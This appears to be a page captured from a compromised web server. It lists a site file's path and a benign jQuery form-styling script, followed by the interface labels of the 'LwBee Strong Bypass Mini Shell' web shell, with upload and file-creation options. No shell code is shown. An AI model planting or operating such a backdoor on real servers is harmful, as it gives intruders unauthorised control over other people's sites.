/home/storage/f/3f/a5/aloic1/public_html/assets/dashboard/js/scripts/ui-form.js
(function ($) {
	"use strict";

	$('input, textarea').each(function(){
		$(this).val() ? $(this).addClass('has-value') : $(this).removeClass('has-value');
	});
	$(document).on('blur', 'input, textarea', function(e){
		$(this).val() ? $(this).addClass('has-value') : $(this).removeClass('has-value');
	});

})(jQuery);
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File